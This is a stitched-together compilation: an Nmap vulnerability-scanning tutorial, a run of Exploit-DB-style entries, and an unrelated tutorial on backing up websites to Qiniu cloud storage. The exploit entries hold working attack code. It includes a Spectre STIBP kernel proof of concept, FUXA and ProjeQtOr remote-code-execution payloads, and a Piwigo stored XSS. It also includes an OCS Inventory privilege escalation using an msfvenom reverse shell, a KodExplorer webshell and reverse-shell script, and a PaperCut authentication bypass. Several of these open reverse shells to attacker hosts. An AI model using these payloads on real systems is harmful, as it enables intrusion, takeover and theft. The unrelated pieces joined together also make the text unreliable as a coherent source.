A little-known part of Nmap is NSE, or Nmap Scripting Engine, which is one of the most powerful and flexible features of Nmap. It allows users to write (and share) simple scripts to automate various network tasks. Nmap has a comprehensive collection of NSE scripts built in, which users can easily use, but users can also use NSE to create custom scripts to meet their personalized needs. Here I will show two similar prefabricated NSE scripts, nmap-vulners and vulscan at the same time. These two scripts are designed to enhance version detection of Nmap by generating relevant CVE information for specific services such as SSH, RDP, SMB, etc. CVE or Common Vulnerabilities and Exposures is a method used by security researchers to leverage databases to catalog and reference individual vulnerabilities. For example, an exploit database is a popular database that publicly discloses vulnerabilities. Exploit-DB uses CVE to compile individual vulnerabilities and vulnerabilities associated with specific versions of services such as "SSH v7.2". Here are screenshots that might be exploited on the Exploit-DB website. Please note the CVE number assigned to this particular SSH vulnerability. Both nmap-vulners and vulscan use CVE records to enhance Nmap's version detection. Nmap will identify the version information of the scan service. The NSE script will get that information and generate a known CVE that can be used to exploit the service, making it easier to find vulnerabilities. Below is an example of Nmap version detection without using NSE scripts. Nmap found an SSH service on port 22 using version "OpenSSH 4.3". nmap -sV -p22 1##.##.###.##.##21 Starting Nmap 7.60 ( https://nmap.org ) Nmap scan report for 1##.##.### .#21 Host is up (0.58s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) ````` Here is an example of the same server using NSE scripts. We can now see that there is more information output. nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.##.#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap scan report for 1##.##.### .#21 Host is up (0.54s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:4.3: | CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051 | CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924 | CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752 | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478 | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692 | CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904 | CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109 | CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000 | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327 |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259 | vulscan: scipvuldb.csv: | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service | [39331] OpenBSD 4.3p2 Audit Log linux_audit_record_event unknown vulnerability | [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability | [43307] OpenBSD 4.0 unknown vulnerability | [41835] OpenBSD up to 4.8 unknown vulnerability | [38743] OpenBSD up to 4.6 unknown vulnerability | [36382] OpenBSD OpenSSH up to 4.6 information disclosure | [32699] OpenBSD OpenSSH 4.1 denial of service | [2667] OpenBSD OpenSSH 4.4 Separation Monitor Designfehler | [2578] OpenBSD OpenSSH up to 4.4 Singal race condition | [32532] OpenBSD OpenSSH 4.5 packet.c denial of service | [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler | [1724] OpenBSD OpenSSH 4.0 GSSAPIDelegateCredentials Designfehler | [1723] OpenBSD OpenSSH 4.0 Dynamic Port Forwarding Designfehler | [26219] OpenBSD OpenSSH up to 4.1 pl information disclosure | [16020] OpenBSD OpenSSH 4.5 Format String The `nmap-vulners NSE` script reports a dozen CVEs disclosed in the past few years. nmap-vulners CVE is organized by severity, "9.3" is the worst and is at the top of the list, so it is worth studying. The vulscan NSE script (after all CVEs) also reports a dozen interesting vulnerabilities related to OpenSSH v4.3. Both NSE scripts show useful information about vulnerable services well. Every time we use NSE scripts, Nmap-vulners will query the Vulners exploit database. Vulscan, on the other hand, queries the local database on our computer, which was preconfigured when we first downloaded vulscan. #Step 1 ##Installation: Nmap-Vulners To install the nmap-vulners script, we first use cd to change to the Nmap script directory. cd /usr/share/nmap/scripts/ Then, clone the nmap-vulners GitHub repository by typing the following command in the terminal. This is why nmap-vulners is installed. No configuration is required after installation. git clone https://github.com/vulnersCom/nmap-vulners.git #Step 2 ##Installation: Vulscan To install vulscan, we also need to clone the GitHub repository into the Nmap script directory. Use the following command to do this. git clone https://github.com/scipag/vulscan.git As mentioned earlier, vulscan uses a preconfigured database stored locally on our computers. We can view these databases in the root directory of the vulscan directory. Run the following ls command to list the available databases. ls vulscan/*.csv vulscan/cve.csv vulscan/exploitdb.csv vulscan/openvas.csv vulscan/osvdb.csv vulscan/scipvuldb.csv vulscan/securityfocus.csv vulscan/securitytracker.csv vulscan/xforce.csv ### Vulscan supports many excellent exploit databases: scipvuldb.csv cve.csv osvdb.csv securityfocus.csv securitytracker.csv xforce.csv exploitdb.csv openvas.csv To ensure that the database is completely up-to-date, we can use the updateFiles.sh script in the vulscan/utilities/updater/directory. Switch to the updater directory by typing the following command in the terminal. cd vulscan/utilities/updater/ Then, use the following chmod command to make sure that the file has the appropriate permissions to execute on your computer. chmod +x updateFiles.sh We can then execute and run the script by typing the following command in our terminal./updateFiles.sh Once we're done, we can now start using NSE scripts. #Step 3 ##Scan with Nmap-Vulners Using NSE scripts is simple. All we have to do is add the --script parameter to our Nmap command and tell Nmap which NSE script to use. To use the nmap-vulners script, we will use the following command. Of course, change #after -p to scan port and change the following #s to the IP address you are using. nmap --script nmap-vulners -sV -p### #.### .#### .##### The -sV is absolutely necessary. Using -sV, we tell Nmap to detect the target address of the version information. If Nmap does not generate version information, nmap-vulners will have no data to query the Vulners database. Always use -sV when using these NSE scripts. nmap --script nmap-vulners -sV -p80 1##.##.###.##.#24 Here is one of the examples in use: nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p22 1##.##.###.##.#43 Starting Nmap 7.60 ( https://nmap.org ) Nmap scan report for 1##.##.###.##.#43 Host is up (0.52s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | vulscan: exploitdb.csv: | [2444] OpenSSH=4.3 pl (Duplicated Block) Remote Denital of Service Exploit | [21402] OpenSSH s.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability | [3303] Portable OpenSSH=3.6.1p-PAM/4.1-SUSE Timing Attack Exploit As VulDB's chief architect, vulscan developers usually spend time updating scipvuldb.csv database files. Querying the database may yield the best results when using the vulscan NSE script. #Step Five Merge into one command As a security scanner, NSE scripts significantly improve Nmap's versatility, scope and resourcefulness. To make full use of Nmap's version scanning, we can use both nmap-vulners and vulscan in one command. To do this, type the following command in the terminal. nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p### #.### .### .#### .####

## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation ## Exploit Author: nu11secur1ty ## CVE ID: CVE-2023-1998 ## Description ## Summary The Linux kernel allows userspace processes to enable mitigations by calling prctl with [PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html) which disables the speculation feature as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same beahaviour can be observed on a bare-metal machine when forcing the mitigation to IBRS on boot comand line. This happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that [STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html) was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy [IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html), the IBRS bit was cleared on returning to userspace, due to performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection against which STIBP protects. ## Severity Medium - The kernel failed to protect applications that attempted to protect against Spectre v2 leaving them open to attack from other processes running on the same physical core in another hyperthread. ## Vulnerable code The Bug present on Kernel 6.2 (https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196) implements an optimization that disables STIBP if the mitgation is IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for bare metal machines without eIBRS support also triggers the bug. ```c /* * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible, * STIBP is not required. */ if (!boot_cpu_has(X86_FEATURE_STIBP) || !smt_possible || spectre_v2_in_ibrs_mode(spectre_v2_enabled)) return; ``` ## Proof of Concept The test consists of two processes. The attacker constantly poisons an indirect call to speculatively redirect it to a target address. The victim process measures the mispredict rate and tries to mitigate the attack either by calling PRCTL or writing to the MSR directly using a kernel module that exposes MSR read and write operations to userspace. ```c /* gcc -o victim test.c -O0 -masm=intel -w -DVICTIM gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1 gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2 gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 -DIBPB gcc -o attacker test.c -O0 -masm=intel -w */ #include "utils.h" #include <stdio.h> #include <string.h> #include <sys/prctl.h> #ifndef PRINT_AMMOUNT #define PRINT_AMMOUNT 1000 #endif #define IA32_SPEC_CTRL 72 uint8_t *rdiPtr; uint8_t unused[0x500]; uint8_t probeArray[0x1000] = {2}; uint8_t unuse2[0x500]; uint32_t f1() {} int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu) { volatile uint8_t d; unsigned tries = 0; unsigned hits = 0; unsigned totalHits = 0; unsigned totalTries = 0; jitForLoop(srcAddress); while (1) { #ifndef VICTIM callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); continue; #else #ifdef IBPB wrmsr_on_cpu(73, cpu, 1); #endif for (int i = 0; i < 100; i++) { d = *dstAddress; flush((uint8_t *)&rdiPtr); callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); } if (probe(&probeArray[0]) < THRESHOLD) { hits++; totalHits++; } totalTries++; if (++tries % PRINT_AMMOUNT == 0) { printf("Rate: %u/%u MSR[72]=%d\n", hits, tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu)); #ifdef MSR wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); #endif tries = 0; hits = 0; if (totalTries >= PRINT_AMMOUNT * 10) { break; } } usleep(1); #endif } printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits, totalTries, (float)totalHits * 100 / (float)totalTries); } int main(int argc, char **argv) { uint64_t srcAddress; uint64_t dstAddress; uint64_t cpu; if (argc < 4) { printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]); printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]); return 0; } srcAddress = (uint64_t)strtoull(argv[1], NULL, 16); dstAddress = (uint64_t)strtoull(argv[2], NULL, 16); cpu = (uint64_t)strtoull(argv[3], NULL, 16); SetCoreAffinity(cpu); uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000); uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000); #ifdef PRCTL if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0) != 0) { perror("prctl"); } printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, 0, 0, 0)); #endif #ifdef MSR printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu); printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); #endif // set up leak gadget into position #ifdef VICTIM rdiPtr = (uint8_t *)f1; copyLeakGadget(dstAddress); #else rdiPtr = (uint8_t *)dstAddress; copyRetGadget(dstAddress); #endif poison(srcAddress, dstAddress, cpu); #ifdef MSR printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); #endif } ``` Timeline **Date reported** to Cloud providers: 31/12/2022 **Date reported** to security@kernel.org: 20/02/2022 **Date fixed:** 10/03/2023 - [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d) - https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d Date disclosed: 12/04/2023 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE) # Date: 18/04/2023 # Exploit Author: Rodolfo Mariano # Vendor Homepage: https://github.com/frangoteam/FUXA # Version: FUXA V.1.1.13-1186 (current) from argparse import RawTextHelpFormatter import argparse, sys, threading, requests def main(rhost, rport, lhost, lport): url = "http://"+rhost+":"+rport+"/api/runscript" payload = { "headers": { "normalizedNames":{}, "lazyUpdate": "null" }, "params":{ "script":{ "parameters":[ { "name":"ok", "type":"tagid", "value":"" } ], "mode":"", "id":"", "test":"true", "name":"ok", "outputId":"", "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) } } } response = requests.post(url, json=payload) args = None parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>") parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost') parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881) parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost') parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport') args=parser.parse_args() main(args.rhost, args.rport, args.lhost, args.lport)

Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE) Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://www.projeqtor.org Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download Date of found: 19.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Possible including php file with phar extension while uploading image. Rce is triggered when we visit again Payload:<?php echo system("id"); ?> poc request: POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1 Host: localhost Content-Length: 1177 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: application/json Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/projeqtor/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic Connection: close ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar" Content-Type: application/octet-stream <?php echo system("id"); ?> ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentId" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefType" User ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefId" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentType" file ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentLink" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentDescription" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentPrivacy" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="uploadType" html5 ------WebKitFormBoundaryY0bpJaQzcvQberWR-- visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) Application: Piwigo Version: 13.6.0 Bugs: Stored XSS Technology: PHP Vendor URL: https://piwigo.org/ Software Link: https://piwigo.org/get-piwigo Date of found: 18.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image) payload: <img%20src=x%20onerror=alert(4)> POST /piwigo/admin.php?page=photo-9 HTTP/1.1 Host: localhost Content-Length: 159 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/piwigo/admin.php?page=photo-9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe Connection: close name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings

##################################################################### # # # Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path # # Date: 2023/04/21 # # Exploit Author: msd0pe # # Vendor Homepage: https://oscinventory-ng.org # # Software Link: https://github.com/OCSInventory-NG/WindowsAgent # # My Github: https://github.com/msd0pe-1 # # Fixed in version 2.3.1.0 # # # ##################################################################### OCS Inventory NG Windows Agent: Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto [2] Get informations about the service: > sc qc "OCS Inventory Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OCS Inventory Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OCS Inventory Service DEPENDENCIES : RpcSs : EventLog : Winmgmt : Tcpip SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe [4] Upload the revese shell to C:\Program Files (x86)\OCS.exe > put OCS.exe > ls drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 . drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .. drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "OCS Inventory Service" > sc start "OCS Inventory Service" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system

# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload # Date: 21/04/2023 # Exploit Author: MrEmpy # Software Link: https://github.com/kalcaddle/KodExplorer # Version: <= 4.49 # Tested on: Linux # CVE ID: CVE-2022-4944 # References: # * https://vuldb.com/?id.227000 # * https://www.cve.org/CVERecord?id=CVE-2022-4944 # * https://github.com/MrEmpy/CVE-2022-4944 import argparse import http.server import socketserver import os import threading import requests from time import sleep def banner(): print(''' _ _____________ _____ _ ______ _____ _____ | | / / _ | _ \ ___| | | | ___ \/ __ \| ___| | |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/| |__ | \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | | __| | |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\| |___ \_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_| \____/\____/ | | |_| [KODExplorer <= v4.49 Remote Code Executon] [Coded by MrEmpy] ''') def httpd(): port = 8080 httpddir = os.path.join(os.path.dirname(__file__), 'http') os.chdir(httpddir) Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(('', port), Handler) print('[+] HTTP Server started') httpd.serve_forever() def webshell(url, lhost): payload = '<pre><?php system($_GET["cmd"])?></pre>' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') wshell_f = open('http/shell.php', 'w') wshell_f.write(payload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') print(f'[+] After the victim opens the URI, his shell will be hosted at {url}/data/User/admin/home/shell.php?cmd=whoami') def reverseshell(url, lhost): rvpayload = ' https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') lport = input('[*] Your local port: ') reqpayload = requests.get(rvpayload).text reqpayload = reqpayload.replace('127.0.0.1', lhost) reqpayload = reqpayload.replace('1234', lport) wshell_f = open('http/shell.php', 'w') wshell_f.write(reqpayload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n') while True: hitshell = requests.get(f'{url}/data/User/admin/home/shell.php') sleep(1) if not hitshell.status_code == 200: continue else: print('[+] Shell sent and executed!') break def main(url, lhost, mode): banner() if mode == 'webshell': webshell(url, lhost) elif mode == 'reverse': reverseshell(url, lhost) else: print('[-] There is no such mode. Use webshell or reverse') if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='target url', dest='url', required=True) parser.add_argument('-lh','--local-host', action='store', help='local host', dest='lhost', required=True) parser.add_argument('-m','--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True) arguments = parser.parse_args() main(arguments.url, arguments.lhost, arguments.mode)

# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass # Date: 21 April 2023 # Exploit Author: MaanVader # Vendor Homepage: https://www.papercut.com/ # Version: 8.0 or later # Tested on: 22.0.4 # CVE: CVE-2023-27350 import requests from bs4 import BeautifulSoup import re def vuln_version(): ip = input("Enter the ip address: ") url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted" response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') text_div = soup.find('div', class_='text') product_span = text_div.find('span', class_='product') # Search for the first span element containing a version number version_span = None for span in text_div.find_all('span'): version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip()) if version_match: version_span = span break if version_span is None: print('Not Vulnerable') else: version_str = version_span.text.strip() print('Version:', version_str) print("Vulnerable version") print(f"Step 1 visit this url first in your browser: {url}") print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard") if __name__ =="__main__": vuln_version()

I have previously mentioned how to automatically backup FTP and databases on Linux VPS daily, but you need to build your own FTP space, which is a bit troublesome than this tutorial. If you don’t have FTP space, you can apply for a Qiniu Cloud Storage. Free 10G space backup is enough for ordinary small sites. Here is a script to backup website files and databases to Qiniu. The actual test results are pretty good. You can automatically backup them every day by setting up a scheduled task under Linux vps. The Github project address of this script: https://github.com/ccbikai/backuptoqiniu First register a Qiniu Cloud account, and then after real-name authentication, you will get 10G of traffic and space. After registering, find the object storage at the left position, then create a new storage space, and remember the name of the newly created storage space, which you need to use later. Method Note: The system python version must be above 2.7 1. Install zip apt-get install zip Note: the centos command is yum install zip 2. Install the backup script wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip unzip backuptoqiniu.zip cd backuptoqiniu python setup.py install 3. Edit configuration file Use vi backuptoqiniu.sh command or Winscp tool to edit ##Backup Configuration Information ## #Backup name, used to mark BACKUP_NAME='backup' #Backup directory, please separate multiple spaces BACKUP_SRC='/home/wwwroot/moerats.com' #Mysql host address MYSQL_SERVER='localhost' #Mysql username MYSQL_USER='root' #Mysql Password MYSQL_PASS='mysqlpassword' #Mysql backup database, please separate multiple spaces MYSQL_DBS='dbname' #Replace the file temporarily in the directory, generally no changes are required BACKUP_DIR='/tmp/backuptoqiniu' #Back up file compression password to ensure the security of the compressed package BACKUP_FILE_PASSWD='123456' ##Backup Configuration Information End ## ##Qi Niu Configuration Information ## #Storage space corresponds to the folder we created on Qiniu QINIU_BUCKET='Rats' QINIU_ACCESS_KEY='ACCESS_KEY' QINIU_SECRET_KEY='SECRET_KEY' ##Qi Niu Configuration Information End ##The script configuration above has basically been written very clearly. The first half of the website is filled in, and the last three lines of information are obtained in Qi Niu. QINIU_BUCKET is the storage space name, ACCESS_KEY and SECRET_KEY are obtained in the personal panel-key management. The long list of AK and SK that corresponds to is the key. 4. Test script chmod +x backuptoqiniu.sh After ./backuptoqiniu.sh is running normally, we can go to the Qiniu background to check if there is any compressed package in the newly created storage space. 5. Set up automatic running scripts crontab -e 0 2 * * 0 /bin//root/backuptoqiniu/backuptoqiniu.sh #Add this script The above script means to use crontab timed tasks to automatically run this script at 2 a.m. every day. For specific usage of crontab, please refer to the file. Detailed explanation of the commands for the installation of Crontab of Linux system and timing tasks Note: Many times our VPS needs to use the timing function when running scripts or restarting certain software. At this time, we need to use the Crontab timing software. Note: If you are using foreign vps, you may also need to set it to domestic time by CP /usr/share/zoneinfo/Asia/Shanghai /etc/localtime. Then service cron restart starts your scheduled task. The effect is as follows You can view the backup files in Qiniu Cloud

